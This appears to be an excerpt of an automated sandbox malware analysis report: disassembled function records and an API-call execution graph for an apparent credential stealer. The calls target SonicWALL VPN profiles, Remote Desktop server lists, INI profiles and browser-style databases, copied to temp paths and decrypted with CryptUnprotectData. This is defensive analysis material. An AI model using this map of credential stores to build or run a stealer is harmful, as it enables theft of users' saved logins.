                                                                                            • Instruction ID: 0f41876b8e9390b048eae397da2bb1006815321d168ec1eaea0afadfb2b25053
                                                                                            • Opcode Fuzzy Hash: 8ac59f02cab71109790e32571a4a62e77d6df544d34a991c1123c13a25c48b9f
                                                                                            • Instruction Fuzzy Hash: BE31B171A08A82A1EA20DF26E8041ED63A1FBC9BC0F544137EE5D877A9EF3DD654C700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: ?
                                                                                            • API String ID: 1818849710-1684325040
                                                                                            • Opcode ID: 9991356b7498287312f88da342bdb997c34c5fd73bb145adfbb6ac68193af689
                                                                                            • Instruction ID: 7052a1b869ef5a37919b6b19872e4023ab9f629fae2642180f984beaf392b323
                                                                                            • Opcode Fuzzy Hash: 9991356b7498287312f88da342bdb997c34c5fd73bb145adfbb6ac68193af689
                                                                                            • Instruction Fuzzy Hash: 9921C473A14780AAE7208F71A8402ED7BB4FB89798B544226EA8C83B59DF3CC154CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                            • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                            • API String ID: 784796242-1893226844
                                                                                            • Opcode ID: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
                                                                                            • Instruction ID: be9448548f7037006387987e6668a2fe11193282b0b9fe50b37f82d03c838f51
                                                                                            • Opcode Fuzzy Hash: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
                                                                                            • Instruction Fuzzy Hash: 1C11FE51A0858370E930EB16E8592FE5361EFC57C4F445133EA5EC76AAEE2DD654C700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$CloseOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1701607978-0
                                                                                            • Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                                            • Instruction ID: 546bde0e54d88eb045526d1d6c98f5cb0ca5cdf69823badc66f305327e66eae7
                                                                                            • Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                                            • Instruction Fuzzy Hash: 69213832618B8592D7208F55E48476EB7B9F7C8B84F154226EA8C87B28DF3DD569CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$AppendPathlstrcpy
                                                                                            • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                            • API String ID: 19203174-1233151749
                                                                                            • Opcode ID: eaec5d34d5b1285c908dcaed520bcbaceea3f8c2caac3e5b03989552e05d685a
                                                                                            • Instruction ID: 1bb4c7e59c123b4e3f0eb12b7065c19729293061faa91c5ab296efd472911211
                                                                                            • Opcode Fuzzy Hash: eaec5d34d5b1285c908dcaed520bcbaceea3f8c2caac3e5b03989552e05d685a
                                                                                            • Instruction Fuzzy Hash: 1D218162618A83A5DA30AF62D8152FD6351FBC8BC4F444137EA5DCB79AEE3DD214C700
                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2FE25
                                                                                            • lstrcatW.KERNEL32 ref: 00007FF6DFE2FE32
                                                                                              • Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF76
                                                                                              • Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF92
                                                                                              • Part of subcall function 00007FF6DFE2FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6DFE2FFBB
                                                                                              • Part of subcall function 00007FF6DFE2FF50: PathFileExistsA.SHLWAPI ref: 00007FF6DFE2FFC4
                                                                                              • Part of subcall function 00007FF6DFE2FF50: OpenFile.KERNEL32 ref: 00007FF6DFE2FFDD
                                                                                              • Part of subcall function 00007FF6DFE2FF50: GetFileSize.KERNEL32 ref: 00007FF6DFE2FFFD
                                                                                              • Part of subcall function 00007FF6DFE2FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6DFE30034
                                                                                              • Part of subcall function 00007FF6DFE2FF50: MapViewOfFile.KERNEL32 ref: 00007FF6DFE30055
                                                                                              • Part of subcall function 00007FF6DFE2FF50: __memcpy.DELAYIMP ref: 00007FF6DFE30067
                                                                                              • Part of subcall function 00007FF6DFE2FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6DFE30072
                                                                                              • Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE3007B
                                                                                              • Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE30084
                                                                                              • Part of subcall function 00007FF6DFE2F294: __memcpy.DELAYIMP ref: 00007FF6DFE2F2B2
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                            • String ID: APPDATA
                                                                                            • API String ID: 2395011915-4054820676
                                                                                            • Opcode ID: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
                                                                                            • Instruction ID: 8c609eaaeaabdafebbffba4f7c5197a53a0f116d1e31bd9ae744c392dc71c051
                                                                                            • Opcode Fuzzy Hash: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
                                                                                            • Instruction Fuzzy Hash: E8114F22728AC3E1EB20DB10E8445EEA361FBC4784F844033EA8D87A59EF7DD618C740

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.6%
                                                                                            Dynamic/Decrypted Code Coverage:47.8%
                                                                                            Signature Coverage:3.6%
                                                                                            Total number of Nodes:694
                                                                                            Total number of Limit Nodes:80
                                                                                            execution_graph 28523 700670 _allmul _allmul _allmul _alldvrm 28419 6e4c6d 17 API calls 28422 6ff86a 30 API calls 28425 73507d 24 API calls 28427 6f807c 23 API calls 28428 722864 25 API calls 28429 6eb079 20 API calls 28528 713e6b 20 API calls 28432 727452 19 API calls 27999 6e3c40 28000 6e1b6a 2 API calls 27999->28000 28001 6e3c50 28000->28001 28002 6e3dfa 28001->28002 28035 6e1000 GetProcessHeap RtlAllocateHeap 28001->28035 28004 6e3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28036 734bec 28004->28036 28006 6e3c9a 28007 6e3dec DeleteFileW 28006->28007 28009 6e3de3 28006->28009 28047 6e1000 GetProcessHeap RtlAllocateHeap 28006->28047 28008 6e1011 3 API calls 28007->28008 28008->28002 28011 733848 74 API calls 28009->28011 28011->28007 28012 6e3cce 28048 7002ec 92 API calls 28012->28048 28014 6e3da8 28051 6ffb92 91 API calls 28014->28051 28016 6e3db1 lstrlen 28017 6e3ddc 28016->28017 28018 6e3db9 28016->28018 28021 6e1011 3 API calls 28017->28021 28052 6e1798 lstrlen 28018->28052 28019 6e1fa7 19 API calls 28028 6e3cd9 28019->28028 28021->28009 28022 6e3dc8 28053 6e1798 lstrlen 28022->28053 28023 6e3d2b lstrlen 28025 6e3d35 lstrlen 28023->28025 28023->28028 28025->28028 28026 6e3dd2 28054 6e1798 lstrlen 28026->28054 28028->28014 28028->28019 28028->28023 28049 6e1000 GetProcessHeap RtlAllocateHeap 28028->28049 28050 7002ec 92 API calls 28028->28050 28031 6e3d46 wsprintfA lstrlen 28032 6e3d83 lstrcat 28031->28032 28033 6e3d71 28031->28033 28034 6e1011 3 API calls 28032->28034 28033->28032 28034->28028 28035->28004 28055 73307c 28036->28055 28038 734c01 28039 734c44 28038->28039 28065 6fc54d memset 28038->28065 28039->28006 28041 734c18 28066 6fc871 21 API calls 28041->28066 28043 734c2a 28067 6fc518 19 API calls 28043->28067 28045 734c33 28045->28039 28068 73486f 87 API calls 28045->28068 28047->28012 28048->28028 28049->28031 28050->28028 28051->28016 28052->28022 28053->28026 28054->28017 28056 733095 28055->28056 28064 73308e 28055->28064 28057 7330ad 28056->28057 28082 6e66ce 17 API calls 28056->28082 28059 7330ed memset 28057->28059 28057->28064 28060 733108 28059->28060 28061 733116 28060->28061 28083 6ec59d 17 API calls 28060->28083 28061->28064 28069 6e6512 28061->28069 28064->28038 28065->28041 28066->28043 28067->28045 28068->28039 28084 6e685c 28069->28084 28071 6e651d 28071->28064 28072 6e6519 28072->28071 28073 6ebfec GetSystemInfo 28072->28073 28087 6e65bd 28073->28087 28075 6ec00e 28076 6e65bd 16 API calls 28075->28076 28077 6ec01a 28076->28077 28078 6e65bd 16 API calls 28077->28078 28079 6ec026 28078->28079 28080 6e65bd 16 API calls 28079->28080 28081 6ec032 28080->28081 28081->28064 28082->28057 28083->28061 28085 73307c 17 API calls 28084->28085 28086 6e6861 28085->28086 28086->28072 28088 73307c 17 API calls 28087->28088 28089 6e65c2 28088->28089 28089->28075 28435 6e4440 24 API calls 28436 706440 92 API calls 28232 6e105d VirtualFree 28531 749238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28532 6e5e5a 28 API calls 28533 7013ca 100 API calls 28437 6e482b 14 API calls 28440 6f943d 33 API calls 28441 71e024 91 API calls 28442 707c28 8 API calls 27929 6ef433 27930 6ef445 27929->27930 27935 6f23b9 27930->27935 27933 6ef47c 27934 6ef490 27933->27934 27943 6ee206 56 API calls 27933->27943 27936 6f23d3 27935->27936 27938 6f2473 27935->27938 27939 6f2431 27936->27939 27947 6f3451 41 API calls 27936->27947 27938->27933 27939->27938 27944 6e63f7 27939->27944 27941 6f240f 27941->27939 27948 6f235a 17 API calls 27941->27948 27943->27934 27949 6ebafc 27944->27949 27945 6e6400 27945->27938 27947->27941 27948->27939 27960 6eb609 27949->27960 27951 6ebb3f GetFileAttributesW 27952 6ebb4b 27951->27952 27956 6ebb14 27951->27956 27953 6ebb5b 27952->27953 27955 6ebb7d 27952->27955 27963 6ea1c6 18 API calls 27953->27963 27954 6ebb25 DeleteFileW 27954->27955 27954->27956 27964 6ea2aa 17 API calls 27955->27964 27956->27951 27956->27953 27956->27954 27959 6ebb1a 27956->27959 27959->27945 27965 6ea08a 27960->27965 27962 6eb60f 27962->27956 27963->27959 27964->27959 27966 6ea0a4 27965->27966 27967 6ea0aa 27966->27967 27969 6e6a81 27966->27969 27967->27962 27970 6e6a8f 27969->27970 27971 6e6aa4 27970->27971 27972 6e6a95 memset 27970->27972 27971->27967 27972->27971 28444 70742e 23 API calls 27973 6ea40e 27976 6ea426 27973->27976 27981 6ea4a2 27973->27981 27974 6ea469 memcpy 27974->27981 27975 6ea44a memcpy 27977 6ea45d 27975->27977 27976->27974 27976->27975 27976->27981 27978 6ea524 27986 6ea2aa 17 API calls 27978->27986 27980 6ea532 27980->27977 27982 6ea53e memset 27980->27982 27981->27978 27983 6ea501 27981->27983 27982->27977 27985 6ea1c6 18 API calls 27983->27985 27985->27977 27986->27980 27994 6e4406 27995 6e2e30 22 API calls 27994->27995 27996 6e4429 27995->27996 27997 6e2e30 22 API calls 27996->27997 27998 6e443a 27997->27998 28541 70f21c 23 API calls 28543 6eca01 _allmul _alldiv _allmul _alldiv 28448 719000 28 API calls 28450 6e581f _alldiv _allrem _allmul 28451 725401 memset memcpy memcpy memset memcpy 28546 700e0c 22 API calls 28455 6ef4ec 20 API calls 28456 7013ca 87 API calls 27679 6e9ee8 27680 6e9f1a 27679->27680 27681 6e9ef1 RtlFreeHeap 27679->27681 27681->27680 27682 6e9f02 27681->27682 27684 6e7f70 17 API calls 27682->27684 27684->27680 28548 719ef6 112 API calls 28549 7013ca 86 API calls 27799 6e28f8 27800 6e2ac8 27799->27800 27801 6e2900 27799->27801 27831 733848 27800->27831 27834 6e1000 GetProcessHeap RtlAllocateHeap 27801->27834 27805 6e290e 27835 7002ec 92 API calls 27805->27835 27806 6e1011 3 API calls 27808 6e2adf 27806->27808 27809 6e1fa7 19 API calls 27820 6e2919 27809->27820 27811 6e2a98 lstrlen 27812 6e2aa4 27811->27812 27813 6e2ac1 27811->27813 27840 6e1798 lstrlen 27812->27840 27815 6e1011 3 API calls 27813->27815 27815->27800 27816 6e2ab1 27841 6e1798 lstrlen 27816->27841 27818 6e2ab9 27842 6e1798 lstrlen 27818->27842 27820->27809 27821 6e29da lstrlen 27820->27821 27825 6e2a8b 27820->27825 27836 6e1000 GetProcessHeap RtlAllocateHeap 27820->27836 27837 6e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27820->27837 27838 7002ec 92 API calls 27820->27838 27821->27820 27822 6e29eb lstrlen 27821->27822 27822->27820 27839 6ffb92 91 API calls 27825->27839 27827 6e2a25 wsprintfA lstrlen 27828 6e2a6a lstrcat 27827->27828 27829 6e2a58 27827->27829 27830 6e1011 3 API calls 27828->27830 27829->27828 27830->27820 27843 7337cb 27831->27843 27834->27805 27835->27820 27836->27820 27837->27827 27838->27820 27839->27811 27840->27816 27841->27818 27842->27813 27844 7337d6 27843->27844 27854 6e2ad1 DeleteFileW 27843->27854 27855 6e95b5 17 API calls 27844->27855 27846 7337db 27847 7337df 27846->27847 27850 7337eb 27846->27850 27856 734da0 17 API calls 27847->27856 27849 733834 27858 733865 69 API calls 27849->27858 27850->27849 27852 73381f 27850->27852 27857 6e8795 22 API calls 27852->27857 27854->27806 27855->27846 27856->27854 27857->27854 27858->27854 28458 6e4cf5 memset 28462 6f5cca 31 API calls 28463 6e6eb7 22 API calls 28553 70c6da 23 API calls 28465 6e5cc5 22 API calls 28466 7170de 24 API calls 28469 7334ca 55 API calls 28557 70faca _allmul strcspn 28470 6fb0aa 82 API calls 28471 7013ca 85 API calls 27685 6e9ea7 RtlAllocateHeap 27686 6e9ed9 27685->27686 27687 6e9ec1 27685->27687 27689 6e7f70 17 API calls 27687->27689 27689->27686 28472 6fb8a6 88 API calls 28560 7013ca 87 API calls 27690 6e24a4 27693 6e2198 RtlZeroMemory GetVersionExW 27690->27693 27694 6e21cb LoadLibraryW 27693->27694 27696 6e21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27694->27696 27697 6e249b 27694->27697 27698 6e2492 FreeLibrary 27696->27698 27703 6e2244 27696->27703 27698->27697 27699 6e247b 27699->27698 27700 6e2365 RtlCompareMemory 27700->27703 27701 6e22e1 RtlCompareMemory 27701->27703 27702 6e1953 6 API calls 27702->27703 27703->27698 27703->27699 27703->27700 27703->27701 27703->27702 27704 6e1011 GetProcessHeap RtlFreeHeap VirtualQuery 27703->27704 27705 6e23f8 StrStrIW 27703->27705 27706 6e17c0 9 API calls 27703->27706 27704->27703 27705->27703 27706->27703 27707 6e2ea5 25 API calls 28561 7012bb _allmul _allmul _allmul _alldvrm _allmul 28562 6e56a2 _allrem 28563 6e96bc _alldiv _alldiv _alldiv _alldiv _allmul 28473 6f78b9 32 API calls 27892 6e2cb5 27893 6e2cbe 27892->27893 27894 6e1953 6 API calls 27893->27894 27895 6e2cc3 27894->27895 27896 6e2e17 27895->27896 27897 6e1953 6 API calls 27895->27897 27898 6e2cd9 27897->27898 27921 6e1000 GetProcessHeap RtlAllocateHeap 27898->27921 27900 6e2ce9 27922 6e1000 GetProcessHeap RtlAllocateHeap 27900->27922 27902 6e2cf9 27923 6e1b6a 27902->27923 27904 6e2d04 27905 6e2d0c GetPrivateProfileSectionNamesW 27904->27905 27906 6e2ded 27904->27906 27905->27906 27919 6e2d22 27905->27919 27907 6e1011 3 API calls 27906->27907 27908 6e2e02 27907->27908 27909 6e1011 3 API calls 27908->27909 27911 6e2e09 27909->27911 27910 6e2d3f StrStrIW 27912 6e2dd7 lstrlenW 27910->27912 27913 6e2d53 GetPrivateProfileStringW 27910->27913 27914 6e1011 3 API calls 27911->27914 27912->27906 27912->27919 27913->27912 27915 6e2d72 GetPrivateProfileIntW 27913->27915 27916 6e2e10 27914->27916 27915->27919 27917 6e1011 3 API calls 27916->27917 27917->27896 27918 6e1953 6 API calls 27918->27919 27919->27906 27919->27910 27919->27912 27919->27918 27920 6e1011 3 API calls 27919->27920 27920->27919 27921->27900 27922->27902 27924 6e1b6f 27923->27924 27925 6e1b99 27923->27925 27924->27925 27926 6e1b76 CreateFileW 27924->27926 27925->27904 27927 6e1b8d CloseHandle 27926->27927 27928 6e1b95 27926->27928 27927->27928 27928->27904 28474 6e6eb7 24 API calls 28475 6e48b1 22 API calls 28571 6f0284 37 API calls 28477 722c9e 103 API calls 28572 70069d _allmul 28574 6e629a 23 API calls 28283 6e3098 28284 6e1b6a 2 API calls 28283->28284 28286 6e30af 28284->28286 28285 6e33a9 28286->28285 28307 6e1000 GetProcessHeap RtlAllocateHeap 28286->28307 28288 6e30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28289 734bec 87 API calls 28288->28289 28292 6e3126 28289->28292 28290 6e339b DeleteFileW 28291 6e1011 3 API calls 28290->28291 28291->28285 28292->28290 28293 6e3392 28292->28293 28308 7002ec 92 API calls 28292->28308 28295 733848 74 API calls 28293->28295 28295->28290 28296 6e3155 28299 6e319c RtlCompareMemory 28296->28299 28300 6e32cd CryptUnprotectData 28296->28300 28301 6e3381 28296->28301 28302 6e31d0 RtlZeroMemory 28296->28302 28304 6e1fa7 19 API calls 28296->28304 28305 6e1011 3 API calls 28296->28305 28306 6e1798 lstrlen 28296->28306 28310 7002ec 92 API calls 28296->28310 28299->28296 28299->28300 28300->28296 28311 6ffb92 91 API calls 28301->28311 28309 6e1000 GetProcessHeap RtlAllocateHeap 28302->28309 28304->28296 28305->28296 28306->28296 28307->28288 28308->28296 28309->28296 28310->28296 28311->28293 28575 6f6698 29 API calls 28483 72348f 27 API calls 28484 6fa16f 32 API calls 28577 6eab68 21 API calls 28580 717762 memset memset memcpy 28486 6fc97b memcpy 28581 707f67 23 API calls 27859 6e2f77 27864 6e2e30 StrStrIW 27859->27864 27862 6e2e30 22 API calls 27863 6e2fab 27862->27863 27865 6e2ebc 27864->27865 27866 6e2e57 27864->27866 27890 6e1000 GetProcessHeap RtlAllocateHeap 27865->27890 27867 6e19e5 9 API calls 27866->27867 27869 6e2e68 27867->27869 27869->27865 27891 6e1bc5 10 API calls 27869->27891 27870 6e2ed0 RegOpenKeyExW 27871 6e2eee 27870->27871 27872 6e2f68 27870->27872 27875 6e2f50 RegEnumKeyExW 27871->27875 27880 6e1953 6 API calls 27871->27880 27883 6e199d 9 API calls 27871->27883 27887 6e2e30 18 API calls 27871->27887 27889 6e1011 3 API calls 27871->27889 27873 6e1011 3 API calls 27872->27873 27877 6e2f6f 27873->27877 27875->27871 27876 6e2f5e RegCloseKey 27875->27876 27876->27872 27877->27862 27878 6e2e75 27879 6e2eb5 27878->27879 27882 6e1afe 10 API calls 27878->27882 27881 6e1011 3 API calls 27879->27881 27880->27871 27881->27865 27884 6e2e83 27882->27884 27883->27871 27885 6e2e91 27884->27885 27886 6e199d 9 API calls 27884->27886 27888 6e1011 3 API calls 27885->27888 27886->27885 27887->27871 27888->27879 27889->27871 27890->27870 27891->27878 28489 715d6f 20 API calls 28582 6ff74d 18 API calls 28490 70e558 22 API calls 28586 706340 90 API calls 28492 70e141 18 API calls 28493 6ea558 18 API calls 28494 70f130 22 API calls 28587 6ecb2a _allmul _allmul 28495 6f0128 34 API calls 28497 6e9925 18 API calls 28592 72c322 27 API calls 28593 6f0f3e 58 API calls 28594 6f7b3d 18 API calls 28500 6f9534 38 API calls 28596 71072d 19 API calls 28597 6fff32 21 API calls 28598 706b14 memset memcpy _allmul 28090 749304 28092 749344 28090->28092 28091 749584 28091->28091 28092->28091 28093 7494da LoadLibraryA 28092->28093 28097 74951f VirtualProtect VirtualProtect 28092->28097 28094 7494f1 28093->28094 28094->28092 28096 749503 GetProcAddress 28094->28096 28096->28094 28098 749519 28096->28098 28097->28091 28503 6f84a7 29 API calls 28603 716f06 24 API calls 28604 705f08 100 API calls 28331 6e3717 28332 6e1b6a 2 API calls 28331->28332 28333 6e372e 28332->28333 28343 6e3c23 28333->28343 28381 6e1000 GetProcessHeap RtlAllocateHeap 28333->28381 28335 6e376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28336 6e379e 28335->28336 28337 6e37a8 28335->28337 28382 6e349b 31 API calls 28336->28382 28339 734bec 87 API calls 28337->28339 28342 6e37b3 28339->28342 28340 6e3c15 DeleteFileW 28341 6e1011 3 API calls 28340->28341 28341->28343 28342->28340 28344 6e3c0c 28342->28344 28383 6e1000 GetProcessHeap RtlAllocateHeap 28342->28383 28345 733848 74 API calls 28344->28345 28345->28340 28347 6e37e3 28384 7002ec 92 API calls 28347->28384 28349 6e3bcc 28389 6ffb92 91 API calls 28349->28389 28351 6e3bd9 lstrlen 28352 6e3c05 28351->28352 28353 6e3be5 28351->28353 28354 6e1011 3 API calls 28352->28354 28390 6e1798 lstrlen 28353->28390 28354->28344 28356 6e3a37 CryptUnprotectData 28375 6e37ee 28356->28375 28357 6e3833 RtlCompareMemory 28357->28356 28357->28375 28359 6e3bf3 28391 6e1798 lstrlen 28359->28391 28361 6e3bfc 28392 6e1798 lstrlen 28361->28392 28363 6e3867 RtlZeroMemory 28385 6e1000 GetProcessHeap RtlAllocateHeap 28363->28385 28365 6e1fa7 19 API calls 28365->28375 28366 6e1011 3 API calls 28366->28375 28367 6e3b0f lstrlen 28368 6e3b21 lstrlen 28367->28368 28367->28375 28368->28375 28369 6e1000 GetProcessHeap RtlAllocateHeap 28369->28375 28370 6e3987 lstrlen 28372 6e3999 lstrlen 28370->28372 28370->28375 28372->28375 28373 6e3b66 wsprintfA lstrlen 28374 6e3ba3 lstrcat 28373->28374 28373->28375 28374->28375 28375->28349 28375->28356 28375->28357 28375->28363 28375->28365 28375->28366 28375->28367 28375->28369 28375->28370 28375->28374 28386 6e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28375->28386 28387 6e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28375->28387 28388 7002ec 92 API calls 28375->28388 28377 6e39de wsprintfA lstrlen 28378 6e3a0d 28377->28378 28379 6e3a1b lstrcat 28377->28379 28378->28379 28380 6e1011 3 API calls 28379->28380 28380->28375 28381->28335 28382->28337 28383->28347 28384->28375 28385->28375 28386->28377 28387->28373 28388->28375 28389->28351 28390->28359 28391->28361 28392->28352 28393 6e2b15 28394 6e1953 6 API calls 28393->28394 28395 6e2b1f FindFirstFileW 28394->28395 28397 6e2b4e 28395->28397 28398 6e2c5c 28395->28398 28400 6e2b59 lstrcmpiW 28397->28400 28407 6e199d 9 API calls 28397->28407 28408 6e19b4 lstrlenW 28397->28408 28412 6e1953 6 API calls 28397->28412 28416 6e199d 9 API calls 28397->28416 28417 6e1011 3 API calls 28397->28417 28399 6e1011 3 API calls 28398->28399 28401 6e2c63 28399->28401 28402 6e2c3d FindNextFileW 28400->28402 28403 6e2b71 lstrcmpiW 28400->28403 28404 6e1011 3 API calls 28401->28404 28402->28397 28406 6e2c51 FindClose 28402->28406 28403->28397 28403->28402 28405 6e2c6a 28404->28405 28406->28398 28409 6e2bdf StrStrIW 28407->28409 28408->28397 28410 6e2c10 StrStrIW 28409->28410 28414 6e2bf1 28409->28414 28410->28414 28411 6e1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28411->28414 28412->28397 28413 6e1011 3 API calls 28413->28402 28414->28410 28414->28411 28414->28413 28418 6e278e 41 API calls 28414->28418 28416->28397 28417->28397 28418->28410 28605 7013ca 70 API calls 28505 6ec9ea _allmul _alldiv 28507 6e99e1 strncmp 28607 707be1 28 API calls 27708 6e47fa 27715 6e479c 27708->27715 27711 6e479c 23 API calls 27712 6e4813 27711->27712 27713 6e479c 23 API calls 27712->27713 27714 6e481f 27713->27714 27724 6e1afe 27715->27724 27718 6e47f1 27718->27711 27720 6e47ea 27765 6e1011 27720->27765 27721 6e47bf 27721->27720 27737 6e1d4a 27721->27737 27770 6e1000 GetProcessHeap RtlAllocateHeap 27724->27770 27726 6e1b0d SHGetFolderPathW 27727 6e1b20 27726->27727 27731 6e1b63 27726->27731 27728 6e1011 3 API calls 27727->27728 27729 6e1b28 27728->27729 27729->27731 27771 6e19e5 27729->27771 27731->27718 27732 6e199d 27731->27732 27786 6e1953 27732->27786 27734 6e19a6 27735 6e1011 3 API calls 27734->27735 27736 6e19af 27735->27736 27736->27721 27738 6e1eb4 27737->27738 27739 6e1d62 27737->27739 27738->27721 27739->27738 27792 6e19b4 27739->27792 27742 6e1d8b 27745 6e1953 6 API calls 27742->27745 27743 6e1d79 27744 6e1953 6 API calls 27743->27744 27746 6e1d83 27744->27746 27745->27746 27746->27738 27747 6e1da3 FindFirstFileW 27746->27747 27748 6e1ead 27747->27748 27755 6e1dba 27747->27755 27749 6e1011 3 API calls 27748->27749 27749->27738 27750 6e1dc5 lstrcmpiW 27752 6e1e8e FindNextFileW 27750->27752 27753 6e1ddd lstrcmpiW 27750->27753 27751 6e1953 6 API calls 27751->27755 27754 6e1ea2 FindClose 27752->27754 27752->27755 27753->27752 27762 6e1df5 27753->27762 27754->27748 27755->27750 27755->27751 27757 6e199d 9 API calls 27755->27757 27756 6e19b4 lstrlenW 27756->27762 27758 6e1e54 lstrcmpiW 27757->27758 27758->27762 27760 6e1011 3 API calls 27760->27752 27761 6e1953 6 API calls 27761->27762 27762->27756 27762->27760 27762->27761 27763 6e199d 9 API calls 27762->27763 27764 6e1d4a 12 API calls 27762->27764 